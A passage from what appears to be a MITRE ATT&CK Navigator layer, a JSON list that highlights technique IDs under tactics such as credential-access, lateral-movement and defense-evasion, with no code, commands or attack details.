"T1078", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, 
{"techniqueID": "T1076", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1212", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1208", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1178", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1178", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1050", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1098", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1098", "tactic": "persistence", "color": 
"#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1089", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1212", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1089", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1211", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1171", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1171", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1077", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1069", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0039", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1107", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1078", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": 
"defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1075", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1200", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1203", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1203", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1219", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1219", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1112", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0029", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "defense-evasion", 
"color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1096", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1004", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1002", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", 
"comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1012", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1007", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1105", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0189", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0007", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1046", "tactic": "discovery", "color": "#fcf26b", "comment": "", 
"enabled": true}, {"techniqueID": "T1105", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1015", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1015", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1084", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1158", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1158", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0013", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0029", "tactic": "execution", "color": "#fcf26b", 
"comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1076", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1040", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1073", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1090", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1090", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "privilege-escalation", "color": "#fcf26b", 
"comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0022", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0022", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0022", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0060", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0060", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0060", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1068", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1033", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1500", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", 
"color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1033", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1211", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1117", "tactic": "defense-evasion", 
"color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1117", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1117", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1035", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1208", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1197", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1197", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0190", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0190", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1053", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "execution", 
"color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0111", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0039", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0039", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0005", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1118", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1121", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1127", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1170", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1220", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1138", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", 
"color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1175", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1203", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1068", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1020", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1002", "tactic": "exfiltration", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1042", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1090", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1090", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1219", "tactic": "command-and-control", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1100", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": 
"T1088", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1027", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1218", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1067", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1067", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1087", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1082", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": 
"T1086", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1070", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1085", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1047", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1175", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, 
{"techniqueID": "T1040", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1040", "tactic": "discovery", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1140", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1196", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1196", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1064", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": 
true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1127", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1127", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1021", "tactic": "lateral-movement", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1059", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1202", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1193", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0032", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0032", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0032", "tactic": "initial-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": 